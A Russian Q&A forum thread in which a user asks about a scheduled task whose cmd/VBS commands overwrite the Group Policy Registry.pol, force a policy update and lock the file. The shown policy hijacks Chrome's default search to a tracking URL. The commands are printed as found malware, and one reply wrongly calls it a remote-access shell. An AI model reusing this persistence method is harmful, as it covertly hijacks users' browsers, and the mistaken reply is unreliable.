Mail.ruПочта0Мой Мир0ОдноклассникиВКонтактеИгры0ЗнакомстваНовостиКалендарьОблакоЗаметкиВсе проекты
Категории Все вопросы проекта Компьютеры, Интернет Темы для взрослых Авто, Мото Красота и Здоровье Товары и Услуги Бизнес, Финансы Наука, Техника, Языки Философия, Непознанное Города и Страны Образование Фотография, Видеосъемка Гороскопы, Магия, Гадания Общество, Политика, СМИ Юридическая консультация Досуг, Развлечения Путешествия, Туризм Юмор Еда, Кулинария Работа, Карьера О проектах Mail Животные, Растения Семья, Дом, Дети Другое Знакомства, Любовь, Отношения Спорт Золотой фонд Искусство и Культура Стиль, Мода, Звезды Полный список Спросить Лидеры
Поиск по вопросам

Virus? Shell? Помогите разобраться

IVan Ibargimovi Ученик (160), закрыт 9 лет назад
Что делает этот скрипт? я в последнее время начал замечать, что периодически на долю секунды запускается cmd, проверил планировщик, там есть такая штука, подозреваю, что это она. Avira не детектит это дело как вирус.

cmd.exe /c @echo Set objShell = WScript.CreateObject("WScript.Shell") > %TEMP%\R.vbs

cmd.exe /c @echo objShell.Run "cmd.exe /c (copy/b/y %WinDir%\system32\GroupPolicy\Machine\R %WinDir%\system32\GroupPolicy\Machine\Registry.pol > nul)&(gpupdate/force)&(attrib +R %WinDir%\system32\GroupPolicy\Machine\Registry.pol)", 0, True >> %TEMP%\R.vbs

wscript.exe %TEMP%\R.vbs

cmd.exe /c del/Q %TEMP%\R.vbs
Дополнен 9 лет назад
мне вообще хотелось получить в ответах чето типо "в этой строчке скрипта делается это, а copy/b/y это значит тото" ибо я ленивый и не хочу гуглить.
Лучший ответ
Александр Искусственный Интеллект (251924) 9 лет назад
На сколько я правильно понял, у тебя создаётся скрипт, который что то там в папке групповых политик у тебя мастрячит.
Вирус ли это - возможно.
Но с таким же успехом это может быть и крякалка на какую нибудь прогу.

Кинь файлик C:\Windows\System32\GroupPolicy\Machine\R.vbs

ps а авира на него и не кинется ни когда. Она быстрее растерзает остатки от выполнения макроса, нежели его первопричину

ps2 если тебе страшно в кишках винды ковыряться, можешь провериться этим http://free.drweb.ru/cureit в безопасном режиме. А в планировщике отключи выполнение
IVan IbargimoviУченик (160) 9 лет назад
PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e...;.D.e.f.a.u.l.t.S.e.a.r.c.h.P.r.o.v.i.d.e.r.E.n.a.b.l.e.d...;....;....;....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e...;.D.e.f.a.u.l.t.S.e.a.r.c.h.P.r.o.v.i.d.e.r.N.a.m.e...;....;....;.>...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e...;.D.e.f.a.u.l.t.S.e.a.r.c.h.P.r.o.v.i.d.e.r.K.e.y.w.o.r.d...;....;....;.>...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e...;.D.e.f.a.u.l.t.S.e.a.r.c.h.P.r.o.v.i.d.e.r.S.e.a.r.c.h.U.R.L...;....;.¤...;.h.t.t.p.:././.s.m.a.r.t.s.p.u.t.n.i.k...r.u./.?.r.i.=.1.&.u.i.d.=.6.2.6.7.7.0.b.c.a.c.4.1.f.8.8.6.7.a.9.c.f.b.5.9.b.3.b.4.a.1.a.d.&.q.=.{.s.e.a.r.c.h.T.e.r.m.s.}...].
Александр Искусственный Интеллект (251924) Я думал ты на почту кинешь
Остальные ответы
какой есть... Просветленный (29538) 9 лет назад
пробуйте докторвэбовскую утилиту скачать и проверить вирусы
егор Оракул (85436) 9 лет назад
в первой строке, создаётся файл r.vbs, во временном каталоге. далее идёт его выполнение. что конкретно мутит сказать не могу, но в конечном итоге файл r.vbs самоудаляется.
удалите эту парашу из планировщика, от греха подальше.
denisonchik Знаток (357) 7 лет назад
Это шелл. Обычно его используют злоумышленники для получения доступа к компьютеру жертве без открытых портов
Похожие вопросы